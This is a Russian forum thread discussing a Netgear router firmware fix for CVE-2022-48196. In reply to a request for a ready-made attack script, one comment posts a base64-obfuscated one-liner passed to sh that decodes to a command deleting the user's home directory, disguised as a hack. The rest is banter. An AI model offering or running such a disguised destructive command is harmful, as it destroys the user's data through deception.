The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



"Уязвимость в устройствах Netgear, эксплуатируемая на стадии до аутентификации"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Уязвимость в устройствах Netgear, эксплуатируемая на стадии до аутентификации"  +/
Сообщение от opennews (??), 03-Янв-23, 09:34 
Компания Netgear выпустила обновление прошивок к беспроводным маршрутизаторам серий RAX40, RAX35, R6400v2, R6700v3, R6900P, R7000P, R7000, R7960P и R8000P, в которых устранена уязвимость (CVE-2022-48196), позволяющая добиться переполнения буфера без прохождения аутентификации. Технические детали и информация о наличии эксплоитов пока не приводится, но судя по выставленному уровню опасности и рекомендации незамедлительно обновить прошивку, проблема напоминает ноябрьскую уязвимость, позволявшую добиться выполнения своего кода с правами root через манипуляции во внешней сети на стороне WAN-интерфейса...

Подробнее: https://www.opennet.ru/opennews/art.shtml?num=58421

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения [Сортировка по времени | RSS]


1. "Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."  +2 +/
Сообщение от Аноним (1), 03-Янв-23, 09:34 
Готовый скрипт есть у кого? Чтобы сразу запустил, и всех поломал, не вникая в скучные детали?
Ответить | Правка | Наверх | Cообщить модератору

2. "Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."  +2 +/
Сообщение от Аноним (2), 03-Янв-23, 09:39 
Да
Ответить | Правка | Наверх | Cообщить модератору

3. "Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."  +/
Сообщение от Аноним (3), 03-Янв-23, 09:39 
Кнопка "сделать мне всё за***сь"? Вернее, "сделать меня кулхацкором"
Ответить | Правка | К родителю #1 | Наверх | Cообщить модератору

6. "Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."  +3 +/
Сообщение от Аноним (6), 03-Янв-23, 11:53 
HACK=`echo "ZGF0ZQo=" | base64 -d`; sh -c $HACK
Ответить | Правка | К родителю #1 | Наверх | Cообщить модератору

11. "Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."  –2 +/
Сообщение от aploskov.dev (ok), 03-Янв-23, 13:30 
Тогда уж, чтоб запомнилось.

HACK=`echo 'cm0gLXJmICIvaG9tZS8kVVNFUi8qIg==' | base64 -d`; sh -c $HACK

Ответить | Правка | Наверх | Cообщить модератору

4. "Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."  –2 +/
Сообщение от Аноним (4), 03-Янв-23, 10:32 
хорошая закладка для господина Майора... хорошая.
Теперь прийдется новую делать - отстой..
Ответить | Правка | Наверх | Cообщить модератору

8. "Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."  +/
Сообщение от Аноним (8), 03-Янв-23, 12:31 
прежнего майора повысили, не гоже оставлять свои наработки для молодняка
Ответить | Правка | Наверх | Cообщить модератору

9. "Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."  –1 +/
Сообщение от Аноним (9), 03-Янв-23, 12:40 
Ты что это же теория заговора, ай-яй-яй. Ты же знаешь что теорий заговора не существует, а тебе должно быть стыдно за то что ты поднял голову и начал ей думать самостоятельно.
Ответить | Правка | К родителю #4 | Наверх | Cообщить модератору

20. "Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."  +/
Сообщение от Кирилл (??), 04-Янв-23, 12:49 
О том и речь, что конспирология и "думать головой" - это вещи взаимоисключающие.
Ответить | Правка | Наверх | Cообщить модератору

5. "Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."  +/
Сообщение от InuYasha (??), 03-Янв-23, 11:30 
Эти хоть патчат - и то молодцы.
Ответить | Правка | Наверх | Cообщить модератору

7. "Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."  –1 +/
Сообщение от Аноним (7), 03-Янв-23, 11:56 
>CVE-2022-48196
>2022

А обновление выпущено в 2023, а не в тот же день! Если об уязвимости они узнали не за час до Нового Года, то оперативность просто поражает. За такой интервал всех, кого нужно, уже поимели.

Ответить | Правка | Наверх | Cообщить модератору

14. "Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."  +/
Сообщение от Атон (?), 03-Янв-23, 14:29 
> Если об уязвимости они узнали не за час до Нового Года, то оперативность просто поражает. За такой интервал всех, кого нужно, уже поимели.

Всех, кого нужно, поимели задолго до того.  Так и узнали об уязвимости.

Ответить | Правка | Наверх | Cообщить модератору

12. "Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."  +/
Сообщение от Аноним (-), 03-Янв-23, 14:11 
> переполнения буфера

Годы идут, но нестареющая классика продолжает радовать людей.

Ответить | Правка | Наверх | Cообщить модератору

18. "Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."  +1 +/
Сообщение от Аноним (18), 04-Янв-23, 00:59 
Буфера всегда радуют. Ну где-то с 13 лет и до самой старости.
Ответить | Правка | Наверх | Cообщить модератору

19. "Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."  +1 +/
Сообщение от Аноним (19), 04-Янв-23, 09:52 
Особенно, когда удаётся выйти за границы буфера.
Ответить | Правка | Наверх | Cообщить модератору

15. "Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."  +2 +/
Сообщение от Аноним (15), 03-Янв-23, 18:51 
Даже у нетгира нет денег и авторитета нанять настоящих сишников…
Ответить | Правка | Наверх | Cообщить модератору

16. "Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."  +1 +/
Сообщение от Аноним (19), 03-Янв-23, 21:40 
Ору.
Ответить | Правка | Наверх | Cообщить модератору

17. "Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."  +/
Сообщение от Аноним (-), 04-Янв-23, 00:21 
Да они так то довольно среднепаршивая фирма. По жизни всякая хня с прошивками.
Ответить | Правка | К родителю #15 | Наверх | Cообщить модератору

21. "Уязвимость в устройствах Netgear, эксплуатируемая на стадии ..."  +/
Сообщение от Омоним (?), 06-Янв-23, 02:59 
Пластик у Netgear-овского железа - просто оцтой. А тут еще и вот это сцамое.
Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру